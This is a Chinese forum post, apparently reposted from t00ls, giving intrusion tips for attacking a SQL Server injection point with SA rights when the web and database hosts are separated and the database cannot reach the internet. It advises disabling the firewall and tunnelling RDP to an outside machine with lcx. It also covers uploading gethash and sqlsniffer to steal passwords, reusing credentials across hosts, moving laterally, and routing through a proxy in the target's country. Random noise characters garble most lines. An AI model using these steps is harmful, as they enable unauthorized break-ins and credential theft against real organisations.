当你碰到SA的注入点,可以执行命令,但是web与数据库分离,你都会怎么做呢,当数据库不服务器不能连接外网的时候,是不是只想着从web搞呢,这篇文章从t00ls转载过来,希望对大家sa权限的注入点数据库web分离提供一些渗透思路。
& U" ^6 r/ f( C9 n3 P& ]! `6 E$ ^7 v; f& R( j! X2 ?1 u
1 i& i4 X/ F. d6 V
) Y# k2 k) b' B# X: G+ B/ ?SA点,system权限,可执行命令,web和db分离.DB机器不上网(一般指中马不上线,lcx反弹不出)
" B# p$ n3 c" _5 R
& @7 A% k2 s9 u/ q7 \" y3 D
, n$ L+ I1 E+ w一、DB机有公网IP.
4 j0 I5 U9 `* Y7 y0 k2 z/ v
# h7 h! \6 S* ^0 Y1 m H6 M1:执行命令把系统防火墙和ip策略停止,netstat -an找到3389端口尝试连接. m5 P, ^" u" E; j9 `
! p7 f* e, ^6 U! m9 x
* e$ a. j1 a' j! I) {$ O$ [- \2:从内往外扫描.把命令行下的s扫描器转成vbs传上DB机器生成exe扫描外网一台做了端口策略的机器.这台外网机器开放所有端口.(可以到网上找这 样的 机器.) 如果扫描结果有开放端口,证明在这台DB机可以把3389转到外面机器.比如扫到80 那就lcx -slave ip 80 127.0.0.1 3389. M+ c" h1 |/ f. s2 ]6 h
, V& D E2 d/ @* G1 I4 n) H
1 L: T* u& w# C4 S0 t% ^3:尽量多拿密码.用vbs的方法上传gethash,sqlsniffer类的工具.拿到系统和mssql的密 码,数据库表的后台管理员密码,member表的最前几个用户密码.这些密码可以用来测试web后台,web的3389 ftp等.当然事先要对web机器完整扫描一遍. www.2cto.com2 c. K$ O+ X: r$ a% P' Z" F
f; n) ~9 ^& P3 z- b' a$ O
+ s4 C1 E- o6 p7 m$ m9 ~4,nmap扫描.用nmap扫描web和db机器的1-65535端口.如果发现db机器显示有closed的端口.那恭喜你,你可以lcx -tran 把3389转发到该端口直接登陆.firewalk也有类似功能.但对代理防火墙无用.
0 }! B8 N* f: t( f
& Y/ A2 {, E- |# l" z/ A* m% U" _
* H" y0 _! p; A+ F/ Y b5 `- E* J$ b0 l! [" ^
二、DB机只有内网IP
' @" E4 x; |" @% Q
3 B. k5 b4 m$ e3 e; O0 v5 D/ p1:尽量多拿密码来net use到web机器.这个过程需要极大的耐心 , 拿密码尝试登陆web后台等. a. j( y" H& B$ ?$ C6 F/ F
# h% {5 c! c- U% @* `4 R6 X1 T
7 M, V6 u' {& I( }) Y8 P/ O+ |
2:停掉防火墙和IP策略再从内往外扫描.
% I. I7 g# v: Y1 A) h' t2 A) {/ Z$ Z. d3 V& Q8 h
3 e. W- r& g* [- }; @( r( m3: ipconfig /dispalydns如果发现有公网的域名,极大可能是路由做了手脚.机会还是有的.
/ e M3 W/ Z! l) X l% Q1 x( |+ [" j. F8 y( _' s1 N0 R
: y3 ]" c" m! `7 ?0 |0 `, [. M4:学会密码规律分析往往会有惊喜.( F3 x7 |. h x$ @1 |6 I
5 A( m" ?( X9 n. e
( c* g* I( g3 f" e5 n5,在sa点里执行命令渗透内网,找可上网的机器.isql,ipc共享,wmi等" M& ^& g, j' |, k1 I: Z/ }
% X! q$ ^( i, S. `; x: T! L/ W, V) |( ~( w$ ~: U N
有些地区或国家会禁止别的国家连接一些端口,所以拥有目标国代理或VPN是很重要的 |